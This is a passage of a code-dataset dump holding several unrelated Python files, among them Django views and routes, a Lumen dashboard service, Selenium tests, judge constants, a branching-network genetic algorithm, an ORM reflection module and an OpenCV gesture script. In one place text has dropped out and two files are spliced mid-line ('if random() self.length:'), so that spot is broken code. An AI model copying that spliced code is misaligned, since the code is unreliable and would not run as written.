url(r'^es/dra.froes-clinica/publicaciones/(?P\\D+)$', 'publicaciones.views.publicaciones', name='publicaciones_es'),\n url(r'^es/dra.froes-clinica/links/$', LinksEsView.as_view(), name='links_es'),\n url(r'^es/dra.froes-clinica/videos/$', 'videos.views.videos_es', name='videos_es'),\n url(r'^es/dra.froes-clinica/agenda/$', 'fotos.views.fotos_es', name='agenda_es'),\n url(r'^es/dra.froes-clinica/noticias/$', NoticiasEsList.as_view(), name='noticias_es'),\n url(r'^es/dra.froes-clinica/contacto/$', 'contact_form.views.contacto', name='contacto_es'),\n)\n","sub_path":"clinica/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"5038738","text":"from gensim.models import KeyedVectors\n\ndef relevance(w):\n try:\n model = KeyedVectors.load_word2vec_format('TabelogAdd.vec.pt', binary=True)\n food = w\n results = model.most_similar(positive = [food,'食べ物'])\n food_list = [results[0][0],results[1][0],results[2][0],results[3][0],results[4][0],results[5][0],results[6][0],results[7][0],results[8][0],results[9][0]]\n similar_list = [results[0][1],results[1][1],results[2][1],results[3][1],results[4][1],results[5][1],results[6][1],results[7][1],results[8][1],results[9][1]]\n return food_list,similar_list,0\n\n except KeyError as e:\n print('error:コーパスにありません')\n return e,1\n\n except FileNotFoundError as e:\n print('error:モデルが見つかりません')\n return e,2\n\nif __name__ == \"__main__\":\n word='ラーメン'\n print(relevance(word))","sub_path":"word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"454976516","text":"'''\n\nBy listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.\n\nWhat is the 10,001st prime number?\n\n'''\n\n\n'''\n the smallest factor of any number, besides 1, is 2\n the largest possible factor of any number corresponds to this 2\n\n the largest possible factor of any number is half that number\n\n but we only need to try numbers from 2 to sqrt(n)\n'''\nimport math\n\ndef is_prime(n):\n '''\n Simplest way to tell if a number is prime is iterate through all the numbers from 2 to n-1 and check if n is divisble by i\n But the largest possible factor of a number is half that number, so we only need to iterate from 2 to n/2\n But this is still doing some extra work:\n Each of the factors larger than sqrt(n)\n corresponds to another factor less than sqrt(n)\n e.g. 
2 corresponds to n/2\n we only need to check one of these factors, not both\n therefore we only need to iterate from 2 to sqrt(n)\n '''\n for i in range(2, n//2 + 1):\n if n % i == 0:\n return False\n '''\n for i in range(2, math.ceil(math.sqrt(n))):\n if n % i == 0:\n return False\n '''\n return True\n\n\ncount = 0\ni=2\nwhile count < 10001:\n\n if is_prime(i):\n count += 1\n\n i += 1\n\nprint(i-1)\n","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"116497737","text":"import json\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import View\n\nfrom .models import CustomizedProduct, CustomizedField, EditableField\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass CreateCustomizedProduct(View):\n \"\"\"\n API method that takes a list of editable fields and their values \n \"\"\"\n @method_decorator(csrf_exempt)\n def dispatch(self, *args, **kwargs):\n return super(CreateCustomizedProduct, self).dispatch(*args, **kwargs)\n\n def post(self, request):\n response = dict(error=\"There was an error\")\n try:\n customized_fields = json.loads(request.body, None)\n except Exception as e:\n response['error'] = str(e)\n return HttpResponse(json.dumps(response), content_type=\"application/json\")\n\n customized_product = CustomizedProduct.objects.create()\n\n for customized_field in customized_fields:\n editable_field = EditableField.objects.get(id=customized_field['editable_field_id'])\n customized_field = CustomizedField.objects.create(\n customized_product=customized_product,\n editable_field=editable_field,\n content=customized_field['content'],\n )\n\n response[\"error\"] = False\n response[\"customized_product_id\"] = customized_product.id\n return HttpResponse(json.dumps(response), content_type=\"application/json\")\n","sub_path":"customized_product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"158589802","text":"import os\nimport yaml\nimport panel as pn\nimport param, time\nfrom lumen.dashboard import Dashboard\nfrom lumen.filters import ConstantFilter, Filter, WidgetFilter # noqa\nfrom lumen.sources import Source, RESTSource # noqa\nfrom lumen import config\n\nfrom sudBoard.settings import BASE_DIR\nfrom vizApps.domain.Board import BoardEntity\n\nfrom vizApps.services.lumen.util import SpecYamlCreator, centerContent\n\ninstancesList = []\n\nclass LumenDashboard(param.Parameterized):\n\n specfile = param.FileSelector()\n reloader = pn.widgets.Button(name='=', width=10)\n config = param.Parameter(precedence=-1)\n specDoc = param.Parameter(precedence=-1)\n dashBoard = param.Parameter(precedence=-1)\n sentinelHackCounter = 0\n loading = False\n indicator = centerContent(pn.indicators.LoadingSpinner(value=True))\n\n\n @classmethod\n def getinstancesBySessionId(cls, sessionId):\n instances = [inst for inst in instancesList if inst._session == sessionId]\n if len(instances) >= 1:\n return instances\n return None\n\n @classmethod\n def clearInstancesForSession(cls, sessionId):\n instances = [inst for inst in instancesList if inst._session == sessionId]\n for i in instances:\n instancesList.remove(i)\n\n @classmethod\n def clearInstances(cls):\n 
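# The 7.py record above argues that trial division only needs candidates up to
# sqrt(n) but ships with that loop commented out in favour of the n//2 bound.
# The same function with the sqrt bound active (math.isqrt is used here instead
# of the record's math.ceil(math.sqrt(n)) to avoid float rounding):
import math

def is_prime_sqrt(n):
    if n < 2:
        return False
    for i in range(2, math.isqrt(n) + 1):
        if n % i == 0:
            return False
    return True

# Sanity check: there are 25 primes below 100.
assert sum(is_prime_sqrt(k) for k in range(100)) == 25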
instancesList.clear()\n\n def __init__(self, **kwargs):\n\n super(LumenDashboard, self).__init__(**kwargs)\n boardId=kwargs['board']\n self.board = BoardEntity.objects.get(id=boardId)\n self._session = kwargs.get('sessionId')+ str(boardId)\n self.josso_session_cookies = {'JOSSO_SESSIONID' : kwargs.get('JOSSO_SESSIONID')}\n self.specDoc = self.createSpecFromData()\n\n\n instancesList.append(self)\n\n def initializerCallback(self):\n print(f\"call initializerCallback; dashboard {self.dashBoard}\")\n\n if not self.dashBoard and not self.loading :\n self.sentinelHackCounter += 1\n print(f\"sentinel UP : {self.sentinelHackCounter}\")\n # premier lancement avec affichage d'un spinner car le server renvoi le document d'un seul tenant,\n # du coup le panel ne s'affiche pas tant que le Dashboard n'est pas totalement chargé!\n self.loading = True\n pn.state.add_periodic_callback(self.update, 700,count=1)\n\n def update(self):\n print(f\"call update; dashboard {self.dashBoard}; sentinel {self.sentinelHackCounter}\")\n\n tic = time.clock()\n if not self.dashBoard:\n try:\n self.dashBoard = Dashboard(specification=self.specDoc.name)\n toc = time.clock()\n print(f\"Time to create the dashboard {self.dashBoard.name} : {toc - tic}\")\n except(Exception) as e:\n self.dashBoard = pn.pane.HTML(object=f\"
Erreur dans la préparation du dashboard : {e}
\")\n print(e)\n else:\n self.dashBoard._yaml_file = self.specDoc.name\n self.dashBoard._load_specification(from_file=True)\n try:\n self.dashBoard._reload()\n except(Exception) as e:\n self.dashBoard = pn.pane.HTML(object=f\"
Erreur dans la préparation du dashboard : {e}
\")\n\n self.loading = False\n\n def createSpecFromData(self):\n\n if self.board.config:\n tic = time.clock()\n specification = self.board.config\n with open(r'specYamlFile/temp/dashboard_{}.yml'.format(self._session), 'w') as file:\n yaml.dump(specification, file)\n toc = time.clock()\n print(f\"Time to create yaml {file.name} : {toc - tic}\")\n return file\n else:\n specification = self.createFakeYaml()\n with open(r'specYamlFile/dashboard_fake_{}.yml'.format(self._session), 'w') as file:\n yaml.dump(specification.__dict__, file)\n return file\n\n def createFakeYaml(self):\n path = BASE_DIR + '/vizApps/services/intake/'\n config = {'title': \"Nouveau DashBoard\", 'layout': \"grid\", 'ncols': 2, 'template': 'material',\n 'theme': 'dark'}\n targets = [\n {\n 'title': 'Nouvelle Source',\n \"source\": {'type': 'intake',\n 'filename': os.path.join(path, 'catalog.yml')},\n 'views': [\n ],\n 'filters': [\n ]\n },\n ]\n specObj = SpecYamlCreator(config=config, targets=targets)\n return specObj\n\n @param.depends('specfile', watch=True)\n def uploadSpecFile(self):\n if self.specfile:\n with open(r'specYamlFile/upload/dashboard_{}.yml'.format(self._session), 'w') as file:\n spec = yaml.load(self.specfile)\n for i in [v for source, v in spec.get('sources').items() if\n v.get('type') == 'json']:\n i['kwargs']['cookies'] = self.josso_session_cookies\n break # no need to iterate further\n yaml.dump(spec, file)\n self.specDoc = file\n self.dashBoard = None\n\n\n\n def updateConfig(self):\n print(f\"call updateConfig; dashboard {self.dashBoard}\")\n\n if self.specDoc.name is not None:\n with open(self.specDoc.name, 'r') as f:\n _yaml = yaml.load(f.read())\n _yaml['config'] = self.configMapping()\n\n with open(r'specYamlFile/temp/new_dashboard_{}.yml'.format(self._session), 'w') as f:\n yaml.dump(_yaml,f)\n self.specDoc = f\n\n def configMapping(self):\n config = {\n 'title': self.config.title,\n 'layout': self.config.layout.name,\n 'ncols': self.config.ncols,\n 'template': self.config.template.name,\n 'theme': self.config.theme.name\n }\n return config\n\n @param.depends('config')\n def panel(self):\n layout = pn.Card(\n sizing_mode = 'stretch_width',\n title = \"Parametres\",\n collapsed = True)\n layout.append(\n pn.Param(\n self.param,\n\n widgets={\n # 'logo': pn.widgets.FileInput(accept='.jpg,.png,.ico,.gif',name=\"Logo\"),\n 'specfile': pn.widgets.FileInput(accept='.yaml,.yml', name=\"Specification File\")},\n show_name=False,\n expand_button=False,\n expand=False,\n sizing_mode=\"stretch_width\"\n ),\n\n )\n if self.config:\n layout.append(pn.Param(\n self.config.param,\n show_name=False,\n expand_button=False,\n expand=False,\n sizing_mode=\"stretch_width\",\n ))\n return layout\n\n @param.depends('dashBoard')\n def main(self):\n print(f\"call main; dashboard {self.dashBoard}, sentinel {self.sentinelHackCounter}\")\n if isinstance(self.dashBoard, Dashboard):\n self.config = self.dashBoard.config\n layout = pn.Column(\n self.dashBoard._main,\n sizing_mode = 'stretch_both',\n margin = 10,\n width_policy = 'max',\n height_policy = 'max'\n\n )\n return layout\n elif self.dashBoard:\n return self.dashBoard\n else:\n return self.indicator\n\n @param.depends('dashBoard')\n def header(self):\n if isinstance(self.dashBoard, Dashboard):\n header= self.dashBoard._header\n return header\n\n @param.depends('dashBoard')\n def sidebar(self):\n if isinstance(self.dashBoard, Dashboard):\n sidebar= self.dashBoard._sidebar\n return sidebar\n\n @param.depends('dashBoard')\n def modal(self):\n if 
isinstance(self.dashBoard, Dashboard):\n modal= self.dashBoard._modal\n return modal\n\n @param.depends('dashBoard')\n def busyIndicator(self):\n spinner = pn.indicators.LoadingSpinner(width=40, height=40)\n pn.state.sync_busy(spinner)\n bi = pn.Row(spinner)\n return bi\n\n","sub_path":"vizApps/services/lumen/lumenService.py","file_name":"lumenService.py","file_ext":"py","file_size_in_byte":8169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"483538501","text":"import time\nimport pytest\nfrom pages.login_page import LoginPage\nfrom pages.product_page import ProductPage\n\n\nclass TestProductPage:\n\n @pytest.mark.parametrize('promo_offer',\n [\"offer0\", \"offer1\", \"offer2\", \"offer3\", \"offer4\", \"offer5\", \"offer6\",\n pytest.param(\"offer7\", marks=pytest.mark.xfail), \"offer8\",\n \"offer9\"])\n def test_guest_can_add_product_to_basket(self, browser, promo_offer):\n # Данные\n link = f\"coders-at-work_207/?promo={promo_offer}\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n product = page.get_product_name_and_price()\n\n # Действия\n page.add_to_basket()\n\n # Проверка\n page.should_be_added_to_basket(product.get('product_name'))\n page.should_be_product_price(product.get('product_price'))\n\n @pytest.mark.xfail(reason=\"invalid test case\")\n def test_guest_cant_see_success_message_after_adding_product_to_basket(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n page.add_to_basket()\n\n # Проверка\n page.should_not_be_success_message()\n\n def test_guest_cant_see_success_message(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n\n # Проверка\n page.should_not_be_success_message()\n\n @pytest.mark.xfail(reason=\"invalid test case\")\n def test_message_disappeared_after_adding_product_to_basket(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n\n # Действия\n page.add_to_basket()\n\n # Проверка\n page.should_be_disappeared()\n\n def test_guest_should_see_login_link_on_product_page(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n\n # Проверка\n page.should_be_login_link()\n\n def test_guest_can_go_to_login_page_from_product_page(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n\n # Действия\n page.go_to_login_page()\n\n # Проверка\n login_page = LoginPage(browser)\n login_page.should_be_login_page()\n\n\n@pytest.mark.user_basket\nclass TestUserAddToBasketFromProductPage():\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n # Данные\n page = LoginPage(browser)\n\n # Подготовка\n page.open()\n email = str(time.time()) + \"@fakemail.org\"\n password = str(time.time())\n\n # Действия\n page.register_new_user(email, password)\n\n # Проверка\n page.should_be_authorized_user()\n\n @pytest.mark.need_review\n def test_user_can_add_product_to_basket(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n product = page.get_product_name_and_price()\n\n # Действия\n page.add_to_basket_without_calc()\n\n # Проверка\n page.should_be_added_to_basket(product.get('product_name'))\n 
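# The lumenService record above tracks every LumenDashboard in a module-level
# instancesList and filters it by the _session attribute. A stripped-down
# sketch of that registry pattern (class and names are illustrative, not the
# original):
class SessionRegistry:
    _instances = []

    def __init__(self, session_id):
        self._session = session_id
        SessionRegistry._instances.append(self)

    @classmethod
    def for_session(cls, session_id):
        found = [i for i in cls._instances if i._session == session_id]
        return found or None

# Like getinstancesBySessionId above, for_session returns None when nothing
# matches, so callers must guard against None before iterating the result.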
page.should_be_product_price(product.get('product_price'))\n\n def test_user_cant_see_success_message(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n\n # Проверка\n page.should_not_be_success_message()\n","sub_path":"module_5/test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"216616247","text":"from django.utils.translation import ugettext_lazy as _\n\nACTIVE_PROBLEMS = 13\n\nSUBMITTED_FILE_EXTENSION = '.submit'\nSUBMITTED_CUSTOM_INPUT_FILE_EXTENSION = '.custom'\nSUBMITTED_LANG_FILE_EXTENSION = '.langs'\nTESTING_PROTOCOL_EXTENSION = '.protocol'\nTESTING_RAW_EXTENSION = '.raw'\n\nDEFAULT_VAR = {\n 'INT_VECTORS': '[1, 2, 3]',\n 'FLOAT_VECTORS': '[0.42, 0.47]',\n 'INTS': '0',\n 'FLOATS': '0.0',\n 'STRS': '\"\"',\n 'STR_VECTORS': '[\"ahojte\", \"vsetci\"]',\n}\n\nclass JudgeTestResult(object):\n \"\"\"\n Groups all common values of test results in protocol.\n Stores verbose versions of results.\n \"\"\"\n OK = 'OK'\n WRONG_ANSWER = 'WA'\n TIME_LIMIT_EXCEEDED = 'TLE'\n RUNTIME_EXCEPTION = 'EXC'\n SECURITY_EXCEPTION = 'SEC'\n IGNORED = 'IGN'\n COMPILATION_ERROR = 'CERR'\n DONE = 'DONE'\n\n VERBOSE_RESULT = {\n OK: _('OK'),\n WRONG_ANSWER: _('Wrong answer'),\n TIME_LIMIT_EXCEEDED: _('Time limit exceeded'),\n RUNTIME_EXCEPTION: _('Runtime exception'),\n SECURITY_EXCEPTION: _('Security exception'),\n IGNORED: _('Ignored'),\n COMPILATION_ERROR: _('Compilation error'),\n DONE: _('Done'),\n }\n\n @classmethod\n def verbose(cls, result):\n return cls.VERBOSE_RESULT.get(result, result)\n\n\nclass ReviewResponse(JudgeTestResult):\n \"\"\"\n Groups all common values of Review.short_response.\n Stores verbose versions of responses.\n \"\"\"\n\n SENDING_TO_JUDGE = 'Sending to judge'\n SENT_TO_JUDGE = 'Sent to judge'\n JUDGE_UNAVAILABLE = 'Judge unavailable'\n PROTOCOL_CORRUPTED = 'Protocol corrupted'\n REVIEWED = 'Reviewed'\n\n VERBOSE_RESPONSE = {\n # strings are as literals here so `manage.py makemessages` will include them into django.po file\n SENDING_TO_JUDGE: _('Sending to judge'),\n SENT_TO_JUDGE: _('Sent to judge'),\n JUDGE_UNAVAILABLE: _('Judge unavailable'),\n PROTOCOL_CORRUPTED: _('Protocol corrupted'),\n REVIEWED: _('Reviewed'),\n }\n\n @classmethod\n def verbose(cls, response):\n if response in cls.VERBOSE_RESPONSE:\n return cls.VERBOSE_RESPONSE[response]\n return cls.VERBOSE_RESULT.get(response, response)\n\n @classmethod\n def all_items_as_choices(cls):\n judge_responses = list(cls.VERBOSE_RESULT.items())\n communication = [(k, v) for k, v in cls.VERBOSE_RESPONSE.items() if k != ReviewResponse.REVIEWED]\n manual = ((ReviewResponse.REVIEWED, cls.verbose(ReviewResponse.REVIEWED)), )\n\n choices = (\n (_('Manual review'), manual),\n (_('Judge test results'), judge_responses),\n (_('Judge communication'), communication),\n )\n\n return choices\n\nclass Language(object):\n CPP = 1\n PYTHON = 2\n PASCAL = 3\n GO = 4\n PHP = 5\n RUST = 6\n PERL = 7\n R = 8\n LANG_CHOICES = (\n (CPP, 'C++'),\n (PYTHON, 'Python'),\n (PASCAL, 'Pascal'),\n (GO, 'Go'),\n (PHP, 'PHP'),\n (RUST, 'Rust'),\n (PERL, 'Perl'),\n (R, 'R'),\n )\n LANG_LINE_LENGTH = {\n CPP: 60,\n PYTHON: 60,\n PASCAL: 65,\n GO: 60,\n PHP: 60,\n RUST: 60,\n PERL: 60,\n R: 65,\n 
}\n","sub_path":"editor/submit/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"526604392","text":"# Copyright (C) 2019 Greenweaves Software Limited\n\n# This is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# This software is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with GNU Emacs. If not, see .\n\n# Optimize flow through a branching network, after West et al--\n# A General Model for the Origin of Allometric Scaling Laws in Biology\n# http://hermes.ffn.ub.es/oscar/Biologia/Escala/Science_276_122_1997.pdf\n\nfrom random import random, seed, choice, gauss\nfrom ga import evolve,plot_fitness\nfrom matplotlib.pyplot import plot, show, legend, xlabel, ylabel, ylim, title, figure, savefig\nfrom numpy import mean, std\nfrom math import sqrt\n\ndef create_branching_network(c=10,gamma0=0.1):\n gamma = [gamma0+(1-gamma0)*random() for _ in range(c)]\n n = [choice([2,4,8,16,32]) for _ in range(c)]\n beta = [1/sqrt(n0) for n0 in n]\n return (beta,gamma,n)\n\ndef get_resistance(beta,gamma,n,r_c=1,l_c=1):\n r = r_c\n l = l_c\n R = [] \n for k in range(len(beta),0,-1):\n r /= beta[k-1]\n l /= gamma[k-1]\n R.append(l * r**-4)\n \n Z = 0\n N = 1 \n for k in range(len(beta)):\n Z += R[k]/N\n N *= n[k]\n \n return Z\n\ndef evaluate_branching_network(individual):\n beta, gamma,n = individual\n return 1/get_resistance(beta,gamma,n)\n\ndef mutate_branching_network(individual,probability=0.5,sigma=0.5):\n def perturb(x,sigma=0.1):\n if random() self.length:\n logging.error(self.__msgerror__(value, \"Maximum length('\" + self.length + \") is exceeded!\", instance))\n return value\n\n\nclass TextField(Field):\n\n def check(self, instance, value):\n if value and not isinstance(value, str):\n logging.error(self.__msgtypeerror__(value, 'str', instance))\n return value\n\n\nclass EmailField(Field):\n \n def check(self, instance, value):\n if not isinstance(value, str):\n logging.error(self.__msgtypeerror__(value, 'str', instance))\n elif not re.search(\"^[^@]+@[^@]+\\.[^@]+$\", value):\n logging.error(self.__msgerror__(value, \"is not a valid email!\", instance))\n return value\n\n\nclass EnumField(Field):\n\n def __init__(self, iscomputed=False, iskey=False, values=[]):\n Field.__init__(self, iscomputed, iskey)\n self.values = values\n \n def check(self, instance, value):\n if value and value not in self.values:\n logging.error(self.__msgerror__(value, \" is not a authorized value for enum!\", instance))\n return value\n\n\nclass FloatField(Field):\n\n def __init__(self, iscomputed=False, iskey=False):\n Field.__init__(self, iscomputed, iskey)\n \n def check(self, instance, value):\n if not value is None: #Don't forget if value==0, return false\n try:\n if isinstance(value, str):\n return float(value)\n except ValueError:\n self.__raise_error__( TypeError(instance, float.name, int, value), \"Type Error on field '\" + self.name + \"' for value:\" + value)\n if isinstance(value, Decimal):\n value = float(value)\n elif not 
isinstance(value, float):\n logging.error(self.__msgtypeerror__(value, 'float', instance))\n return value\n\n\nclass BoolField(Field):\n\n def __init__(self, iscomputed=False, iskey=False):\n Field.__init__(self, iscomputed, iskey)\n \n def check(self, instance, value):\n try:\n if isinstance(value, str):\n return bool(value)\n except ValueError:\n self.__raise_error__( TypeError(instance, self.name, bool, value), \"Type Error on field '\" + self.name + \"' for value:\" + value)\n if value and not isinstance(value, bool):\n logging.error(self.__msgtypeerror__(value, 'bool', instance))\n return value\n\n\nclass DateField(Field):\n\n def check(self, instance, value):\n try:\n if isinstance(value, str):\n return date.fromisoformat(value)\n elif isinstance(value, datetime):\n return datetime.date(value.year, value.month, value.day)\n else:\n if value and not isinstance(value, date):\n logging.error(self.__msgtypeerror__(value, 'date', instance))\n except ValueError:\n logging.error(self.__msgtypeerror__(value, 'date', instance))\n return value\n\n\nclass DateTimeField(Field):\n\n def check(self, instance, value):\n if isinstance(value, str):\n try:\n return datetime.fromisoformat(value)\n except ValueError:\n logging.error(self.__msgtypeerror__(value, 'datetime', instance))\n return value\n else:\n if value and not isinstance(value, datetime):\n logging.error(self.__msgtypeerror__(value, 'datetime', instance))\n return value\n\n\nclass ArrayField(Field):\n\n def __init__(self, iscomputed=False, iskey=False, arraytype=None, length=None):\n Field.__init__(self, iscomputed, iskey)\n self.arraytype = arraytype\n self.length = length\n \n def check(self, instance, value):\n if not isinstance(value, list):\n logging.error(self.__msgtypeerror__(value, 'list', instance))\n if not self.arraytype is None:\n for i in value:\n if not isinstance(i, int):\n logging.error(self.__typee(value, self.name, str(self.arraytype)))\n if not self.length is None and len(value) != self.length:\n logging.error(self.__msgerror__(value, \"Invalid number of elements'\" + self.length + \"!\", instance))\n return value\n\n\nclass ManyToOneField(Field):\n\n def __init__(self, iscomputed=False, iskey=False, modelname=None):\n Field.__init__(self, iscomputed, iskey)\n if modelname is None:\n logging.error(self.__msgerror__(None, \"'modelname' attribute must be specified!\"))\n else:\n self.modelname = modelname\n\n\nclass ListField(Field):\n\n def __init__(self, iscomputed=False, iskey=False, modelname=None, select=None):\n if modelname is None or select is None:\n logging.error(self.__msgerror__(None, \"'modelname' and 'select' attributes must be specified!\"))\n Field.__init__(self, iscomputed, iskey)\n self.modelname = modelname\n self.select = select\n self.value = []\n\n def check(self, instance, value):\n if not isinstance(value, list):\n logging.error(self.__msgtypeerror__(value, 'list', instance))\n return value\n\n\nclass ModelObject(object):\n '''\n Parent class for all model object.\n '''\n\n @classmethod\n def get_model_name(cls):\n return cls.__name__\n\n def __init__(self):\n self.haserror = False\n \n def _as_dict(self):\n __dict = {}\n modelclass = ModelDict().get_model_class(self.get_model_name())\n for field in modelclass.get_fields():\n if hasattr(self, field.name):\n __dict[field.name] = getattr(self, field.name)\n return __dict\n\n def __str__(self):\n model = ModelDict().get_model_class(self.get_model_name())\n return model.model_str(self)\n\n def check(self):\n self.haserror = False\n modelclass = 
ModelDict().get_model_class(self.get_model_name())\n for field in modelclass.get_fields():\n if not isinstance(field, ListField):\n field.check(self, getattr(self, field.name))\n return self.haserror\n \n'''\n M E T A - D I C T I O N A R Y\n -----------------------------\n'''\nclass ModelClass():\n\n def __init__(self, cls_, name, fields, dictfields):\n self.fields = fields\n self.dictfields = dictfields\n self.name = name\n self.klazz = cls_\n self.key_field = None\n ModelDict().add_modelClass(name, self)\n \n def get_fields(self):\n return self.fields;\n\n def get_id(self, record):\n return getattr(record, self.get_key_field().name)\n\n def get_key_field(self):\n for field in self.fields:\n if field.iskey:\n self.key_field = field\n break\n return self.key_field;\n\n def get_field(self, field_name):\n try:\n return self.dictfields[field_name]\n except KeyError:\n raise ValueError(\"No field '\" + field_name + \"' for '\" + self.name + \"'!'\")\n\n def new_instance(self):\n return eval(\"ModelObject()\", { \"ModelObject\": self.klazz})\n\n def head(self, instance, model_name):\n head = model_name + \"(\"\n delim = ''\n for field in self.fields:\n if hasattr(instance, field.name) and field.iskey:\n head += delim + field.name + ': ' + str(getattr(instance, field.name))\n delim = ', '\n head += \")\" \n return head\n \n def model_str(self, instance):\n model_str = self.head(instance, self.name) + \"\\n\"\n for field in self.fields:\n if not field.iskey and not isinstance(field, ListField) and hasattr(instance, field.name):\n attr = getattr(instance, field.name)\n if hasattr(attr, 'get_model_name'):\n attr = self.head(attr, type(attr).__name__)\n model_str += ' ' + field.name + ': ' + str(attr) + '\\n'\n return model_str\n\n def pre_persist(self, record):\n pass\n\n def pre_merge(self, record):\n pass\n\n def pre_remove(self, record):\n pass\n\n\nclass ModelDict(object):\n \"\"\"\n ModelDict is a SINGLETON class containing a dictonary {modek_name, ModelClass}, instance of ModelClass containing needed information on fields \n \"\"\"\n __instance = None\n __models = {}\n\n def __new__(cls):\n if ModelDict.__instance is None:\n ModelDict.__instance = object.__new__(cls)\n return ModelDict.__instance\n \n def add_modelClass(self, name:str, modelClass):\n ModelDict.__models[name] = modelClass\n \n def get_model_class(self, model_name:str):\n '''\n Generally, model class is already present inside dictionary because dictionary are populated during first model class call.\n However, item can be missing e.g. when building ListField because dictionary information are required before instantiation. 
\n '''\n try:\n return ModelDict.__models[model_name]\n except (KeyError):\n self.__instantiate(model_name)\n return ModelDict.__models[model_name]\n\n def __instantiate(self, name):\n \"\"\"\n Create a class instance from class '{class_name}' from module 'matcho.model.{class_name}'\n \"\"\"\n try:\n module_path = \"matcha.model.\" + name\n mod = importlib.import_module(module_path)\n eval(\"ModelObject()\", { \"ModelObject\": getattr(mod, name)})\n except (ImportError, AttributeError):\n raise ImportError(name)\n\n\n\n'''\n D E C O R A T O R S\n -------------------\n'''\n\n'''\nfunction decorator launch when calling model class for the first time.\n''' \ndef metamodelclass(cls=None):\n\n def wrap(cls):\n fields = []\n dictfield = {}\n \n cls_annotations = cls.__dict__.get('__annotations__', {})\n for name, field in cls_annotations.items():\n if isinstance(field,Field):\n field.name = name\n fields.append(field)\n dictfield[name] = field\n ModelClass(cls, cls.__name__, fields, dictfield)\n return cls\n\n return wrap(cls)\n\n\n'''\nclass Dispatcher is a decorator use on Model Instance in order to assume serialization and deserialization\n''' \nclass _Dispatcher:\n\n def __init__(self, classname_key='__class__'):\n self._key = classname_key\n self._classes = {} # to keep a reference to the classes used\n\n def __call__(self, class_): # decorate a class\n self._classes[class_.__name__] = class_\n return class_\n\n def decoder_hook(self, d):\n classname = d.pop(self._key, None)\n modelclass = ModelDict().get_model_class(classname)\n if classname:\n if modelclass:\n for field in modelclass.get_fields():\n if isinstance(field, DateTimeField):\n dt = d[field.name]\n if dt:\n d[field.name] = datetime.fromisoformat(dt)\n elif isinstance(field, DateField):\n dt = d[field.name]\n if dt:\n d[field.name] = date.fromisoformat(dt)\n obj = self._classes[classname]()\n for name, value in d.items():\n setattr(obj, name, value)\n return obj\n\n def encoder_default(self, obj):\n if isinstance(obj, date) or isinstance(obj, datetime):\n return str(obj)\n d = obj._as_dict()\n d[self._key] = type(obj).__name__\n return d\n\n\ndispatcher = _Dispatcher()","sub_path":"src/matcha/orm/reflection.py","file_name":"reflection.py","file_ext":"py","file_size_in_byte":13980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"5821440","text":"#for proper functioning ensure that the background is plain (ideally a wall)\n#try moving hand forward or backward if right gesture is not recognized \n#fit your hand (upto wrist) within the rectangle(ROI) \n\nimport cv2 as cv\nimport numpy as np\nimport math\n\ncap=cv.VideoCapture(0)\n\n\ndef dist(p1,p2):\n return math.sqrt(((p2[0] - p1[0]) ** 2) + ((p2[1] - p1[1]) ** 2))\n\nwhile True:\n \n _,frame=cap.read()\n frame=cv.flip(frame,1)\n #region of interest where gesture are identified\n cv.rectangle(frame,(340,100),(600,300),(0,255,0),0)\n roi=frame[100:300,340:600]\n \n #processing Roi\n roi_blur = cv.GaussianBlur(roi, (15, 15), 0)\n hsv_roi=cv.cvtColor(roi_blur, cv.COLOR_BGR2HSV)\n \n #range of skin color\n su= np.array([180,255,255], dtype=np.uint8)\n sl= np.array([0,60,0], dtype=np.uint8)\n\n #creating a mask which will remove all non skin colored region\n mask = cv.inRange(hsv_roi, sl, su)\n #masking roi with the mask\n res=cv.bitwise_and(roi,roi,mask=mask)\n \n #thresholding to get a grayscale image\n _, res = cv.threshold(res, 25, 255, cv.THRESH_BINARY)\n res=cv.GaussianBlur(res, (5, 5), 0)\n 